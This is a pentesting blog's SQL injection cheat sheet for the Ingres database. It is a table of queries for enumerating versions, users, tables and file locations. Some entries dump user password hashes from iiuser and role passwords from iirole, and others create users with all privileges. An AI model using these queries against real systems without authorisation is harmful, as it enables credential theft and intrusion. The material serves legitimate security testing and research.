Ingres SQL Injection Cheat Sheet
Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.
Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here.
This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
| Version | select dbmsinfo(‘_version’); |
| Comments | SELECT 123; — comment select 123; /* comment */ |
| Current User | select dbmsinfo(‘session_user’); select dbmsinfo(‘system_user’); |
| List Users | First connect to iidbdb, then: SELECT name, password FROM iiuser; — or SELECT own FROM iidatabase; |
| Create Users | create user testuser with password = ‘testuser’;– priv |
| List Password Hashes | First connect to iidbdb, then: select name, password from iiuser; |
| List Privileges | select dbmsinfo(‘db_admin’); select dbmsinfo(‘create_table’); select dbmsinfo(‘create_procedure’); select dbmsinfo(‘security_priv’); select dbmsinfo(‘select_syscat’); select dbmsinfo(‘db_privileges’); select dbmsinfo(‘current_priv_mask’); |
| List DBA Accounts | TODO |
| Current Database | select dbmsinfo(‘database’); |
| List Databases | SELECT name FROM iidatabase; — connect to iidbdb |
| List Columns | select column_name, column_datatype, table_name, table_owner from iicolumns; |
| List Tables | select table_name, table_owner from iitables; select relid, relowner, relloc from iirelation; select relid, relowner, relloc from iirelation where relowner != ‘$ingres’; |
| Find Tables From Column Name | SELECT table_name, table_owner FROM iicolumns WHERE column_name = ‘value’ |
| Select Nth Row | Astoundingly, this doesn’tseem to be possible! This is as close as you can get:select top 10 blah from table; select first 10 blah form table; |
| Select Nth Char | select substr(‘abc’, 2, 1); — returns ‘b’ |
| Bitwise AND | The function “bit_and” exists, but seems hard to use. Here’s an example of ANDing 3 and 5 together. The result is a “byte” type with value ?01:select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1); |
| ASCII Value -> Char | TODO |
| Char -> ASCII Value | TODO (The “ascii” function exists, but doesn’t seem to do what I’d expect.) |
| Casting | select cast(123 as varchar); select cast(‘123’ as integer); |
| String Concatenation | select ‘abc’ || ‘def’; |
| If Statement | TODO |
| Case Statement | TODO |
| Avoiding Quotes | TODO |
| Time Delay | ???See Heavy Queries article for some ideas. |
| Make DNS Requests | TODO |
| Command Execution | Impossible? |
| Local File Access | TODO |
| Hostname, IP Address | SELECT dbmsinfo(‘ima_server’) |
| Location of DB files | SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = ‘value’ — primary location of db SELECT lname FROM iiextend WHERE dname = ‘value’ — extended location of db SELECT are FROM iilocations where lname = ‘value’ — all area (ie directory) linked with a location |
| Default/System Databases | SELECT name FROM iidatabase WHERE own = ‘$ingres’ — connect to iidbdb |
| Installing Locally | The Ingres database can be downloaded for free from http://esd.ingres.com/ A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832 |
| Database Client | TODO There is a client called “sql” which can be used for local connections (at least) in the database server package above. |
| Logging in from command line | $ su – ingres $ sql iidbdb * select dbmsinfo(‘_version’); go |
| Identifying on the network | TODO |
The following areas are interesting enough to include on this page, but I haven’t researched them for other databases:
| Description | SQL / Comments |
| Batching Queries Allowed? | Not via DBI in PERL. Subsequent statements seem to get ignored: select blah from table where foo = 1; select … doesn’t matter this is ignored. |
| FROM clause mandated in SELECTs? | No. You don’t need to select form “dual” or anything. The following is legal: select 1; |
| UNION supported | Yes. Nothing tricky here. The following is legal: select 1 union select 2; |
| Enumerate Tables Privs | select table_name, permit_user, permit_type from iiaccess; |
| Length of a string | select length(‘abc’); — returns 3 |
| Roles and passwords | First you need to connect to iidbdb, then: select roleid, rolepass from iirole; |
| List Database Procedures | First you need to connect to iidbdb, then: select dbp_name, dbp_owner from iiprocedure; |
| Create Users + Granting Privs | First you need to connect to iidbdb, then: create user pm with password = ‘password’; grant all on current installation to pm; |
Thanks
Pentestmonkey gratefully acknowledges the contributions of:
Jean-Pierre Zuate
Leave a Reply
You must be logged in to post a comment.